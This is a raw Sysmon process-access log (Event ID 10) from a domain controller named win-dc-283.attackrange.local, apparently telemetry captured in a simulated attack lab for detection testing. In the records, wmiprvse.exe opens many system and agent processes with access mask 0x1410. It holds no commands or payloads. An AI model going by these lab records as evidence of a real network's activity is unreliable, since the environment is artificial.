15:59:35.506{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026164Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.506{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026163Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.506{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026162Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.506{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026161Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.506{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026160Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.506{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026159Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.506{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026158Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.506{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026157Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.506{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026156Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.506{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026155Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.506{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026154Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.506{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026153Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.506{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026152Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.506{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026151Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.506{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026150Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.506{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026149Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.506{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026148Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.506{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026147Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.506{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026146Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.506{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026145Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 